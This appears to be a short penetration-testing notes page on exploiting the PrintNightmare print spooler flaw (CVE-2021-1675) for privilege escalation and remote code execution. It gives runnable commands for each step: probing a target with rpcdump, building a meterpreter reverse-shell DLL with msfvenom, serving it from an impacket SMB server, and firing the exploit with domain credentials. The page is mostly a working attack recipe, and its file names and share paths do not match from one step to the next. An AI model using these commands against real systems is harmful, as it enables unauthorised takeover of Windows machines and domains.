Print Nightmare (CVE-2021-1675)
Requirements: User
Intro
This is a privilege escalation vulnerability and RCE (Remote Command Execution) that takes advantage of a service called Spooler to get administrative privileges. Since spooler runs as admin once exploited, we get admin privileges. We can do it remotely too, using impacket and other useful tools.
Requirements
Have access as a user on the machine.
Execution
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
If we see this as is shown here, then is vulnerable.
Creating a malicious .dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f dll > malicious.dll
Now start listening with a meterpreter session.
Start an SMB Server
smbserver.py share `pwd` -smb2support
Using the exploit
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
Last updated